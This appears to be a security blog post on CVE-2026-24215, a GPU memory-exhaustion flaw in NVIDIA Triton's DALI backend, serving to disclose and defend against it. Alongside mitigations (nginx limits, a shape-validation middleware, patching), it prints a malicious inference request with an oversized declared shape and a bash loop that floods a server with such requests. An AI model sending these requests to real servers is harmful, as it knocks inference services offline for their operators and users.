ekofyi
Security Research7 min read

CVE-2026-24215: NVIDIA Triton's DALI Backend Will Let Attackers Eat Your GPU Memory for Breakfast

A new resource consumption vulnerability (CVE-2026-24215) in NVIDIA Triton Inference Server's DALI backend allows attackers to exhaust GPU memory, leading to denial-of-service. This post details the vulnerability, its impact, and immediate mitigation strategies.

Your ML Inference Server Is One Request Away From a DoS

If you're running NVIDIA Triton Inference Server with the DALI backend — and if you're doing any kind of image or video preprocessing in your ML pipeline, there's a good chance you are — you need to pay attention to this one.

CVE-2026-24215 just dropped, and it's a resource consumption vulnerability that lets an attacker starve your inference server of resources until it falls over.

The CVSS score is 5.7 (Medium), which means it might not grab widespread attention. But here's the thing: denial-of-service against ML inference infrastructure is not a medium-severity problem in practice. If your revenue depends on model predictions being available — fraud detection, recommendation engines, real-time content moderation — this is a business-critical issue wearing a "medium" label.

I've seen too many teams dismiss medium-severity CVEs in their ML stack because "it's not RCE." That's the wrong framing. Let me walk you through why.

What Happened

NVIDIA published CVE-2026-24215, affecting the DALI (Data Loading Library) backend in Triton Inference Server. The vulnerability allows an attacker to trigger uncontrolled resource consumption — meaning they can craft requests that cause the server to allocate memory (likely GPU memory, given DALI's role) without proper bounds checking or cleanup.

DALI is NVIDIA's high-performance data loading and preprocessing library. In the context of Triton, it handles the heavy lifting of image decoding, resizing, augmentation, and other preprocessing steps before tensors hit your model. It's the front door of your inference pipeline.

The attack vector here is network-based. An attacker doesn't need local access or authentication (depending on your Triton deployment configuration). They send specially crafted inference requests to the DALI backend, and the server dutifully allocates resources to process them — without enforcing sane limits on what those requests can demand.

The result: memory exhaustion, GPU OOM errors, and eventually your inference server either crashes or becomes so degraded that legitimate requests time out. Classic resource exhaustion DoS.

Technical Deep-Dive: How the Attack Works

To understand this vulnerability, you need to understand how DALI pipelines work inside Triton.

When you configure a DALI backend model, you define a preprocessing pipeline that gets executed for every inference request:

python
import nvidia.dali as dali

@dali.pipeline_def(batch_size=256, num_threads=4, device_id=0)
def preprocessing_pipeline(data):
    images = dali.fn.decoders.image(data, device="mixed")
    resized = dali.fn.resize(images, resize_x=224, resize_y=224)
    normalized = dali.fn.crop_mirror_normalize(
        resized,
        mean=[0.485 * 255, 0.456 * 255, 0.406 * 255],
        std=[0.229 * 255, 0.224 * 255, 0.225 * 255]
    )
    return normalized

The problem is in how DALI handles input data sizing. When an attacker sends a request with input tensors that declare extremely large dimensions or malformed shape metadata, DALI attempts to allocate buffers to accommodate them before validating whether the request is reasonable.

Here's what a malicious request might look like:

http
POST /v2/models/dali_preprocessing/infer HTTP/1.1
Host: triton-server:8000
Content-Type: application/json

{
  "inputs": [{
    "name": "INPUT_0",
    "shape": [1, 100000, 100000, 3],
    "datatype": "UINT8",
    "data": []
  }]
}

That shape field claims the input is a 100,000 x 100,000 pixel image. DALI's backend attempts to allocate memory for intermediate processing buffers based on this declared shape. Even if the actual payload is empty or tiny, the allocation happens based on the declared dimensions.

Send a few dozen of these concurrently, and you've exhausted the GPU memory pool. The server starts rejecting legitimate requests or crashes outright.

The root cause is a classic TOCTOU (time-of-check-time-of-use) gap combined with missing input validation — the shape metadata is trusted before the actual data is validated against it.

bash
# Simple PoC: send concurrent malformed requests to exhaust resources
for i in $(seq 1 50); do
  curl -s -X POST http://triton-server:8000/v2/models/dali_preprocessing/infer \
    -H "Content-Type: application/json" \
    -d '{"inputs":[{"name":"INPUT_0","shape":[1,50000,50000,3],"datatype":"UINT8","data":[]}]}' &
done
wait

The fix needs to happen at two levels: DALI needs to validate input shapes against configured maximums before allocating buffers, and Triton's request handling needs to enforce resource quotas per-request.

Impact Analysis

Who's affected? Anyone running Triton Inference Server with DALI backend models exposed to untrusted network traffic. This is more common than you'd think — many deployments put Triton behind an API gateway but don't enforce strict input validation at the gateway level because "the model server handles that."

The blast radius depends on your architecture. If you're running a shared Triton instance serving multiple models, a DoS against the DALI backend takes down all models on that server, not just the DALI-backed ones. GPU memory is a shared resource. One model's OOM is every model's OOM.

Real-world implications: if you're in production with Triton serving customer-facing predictions — think content moderation, visual search, autonomous vehicle perception pipelines, or medical imaging — this vulnerability means an unauthenticated attacker can take your inference offline.

The 5.7 CVSS score reflects the "availability" impact, but it doesn't capture the cascading business impact of your ML pipeline going dark.

What To Do About It Right Now

First, check if you're affected. If you're running Triton with any DALI backend models, assume you are until you've patched:

bash
# Check your Triton version and loaded models
curl -s http://localhost:8000/v2/health/ready
curl -s http://localhost:8000/v2/repository/index | python3 -m json.tool | grep -i dali

# Check your container image version
docker inspect --format='{{.Config.Image}}' \
  $(docker ps -q --filter ancestor=nvcr.io/nvidia/tritonserver)

Immediate mitigation (before you can patch): enforce input size limits at your API gateway or load balancer. Don't let requests with absurd tensor shapes reach Triton.

nginx
# nginx rate limiting + request size cap for Triton
server {
    location /v2/models/ {
        client_max_body_size 10m;
        limit_req zone=triton_limit burst=20 nodelay;
        proxy_pass http://triton-backend;
    }
}

But request body size alone won't save you — the attack uses small payloads with large declared shapes. You need application-level validation.

If you have a middleware layer, add shape validation:

python
# Middleware: validate input shapes before forwarding to Triton
MAX_DIMENSION = 4096  # Reasonable max for your use case

def validate_inference_request(request_body: dict) -> bool:
    for input_tensor in request_body.get("inputs", []):
        shape = input_tensor.get("shape", [])
        for dim in shape:
            if dim > MAX_DIMENSION:
                raise ValueError(
                    f"Input dimension {dim} exceeds maximum {MAX_DIMENSION}"
                )
        # Also validate total element count
        total_elements = 1
        for dim in shape:
            total_elements *= dim
        if total_elements > 50_000_000:  # 50M elements max
            raise ValueError("Total tensor size exceeds limit")
    return True

Patch: Update to the latest Triton Inference Server release that includes the fix. Monitor NVIDIA's security bulletin page for the specific patched version. If you're pulling from nvcr.io/nvidia/tritonserver, update your image tag and redeploy.

One more thing to watch out for: if you're running Triton in Kubernetes with autoscaling, a resource exhaustion attack might trigger aggressive pod scaling before the pods crash — potentially running up your cloud bill before the DoS actually manifests as downtime. Set resource limits on your Triton pods.

The Bigger Picture

This CVE is a symptom of a broader problem: ML infrastructure is being deployed with the security posture of internal tooling but the exposure of production services.

Teams treat model servers like they're behind seven layers of VPN, but in reality they're often one misconfigured ingress rule away from the internet.

Input validation for ML inference is fundamentally different from traditional web app input validation. You're not just checking string lengths and SQL injection patterns — you're validating tensor shapes, data types, batch sizes, and sequence lengths. Most WAFs have zero understanding of these attack surfaces.

If you're running inference infrastructure, you need to build this validation layer yourself, and you need to treat it as a first-class security control, not an afterthought.

Related posts

Written by Eko

If you found this useful, follow @ekofyi on X for more notes like this — or get in touch if you have a problem to solve.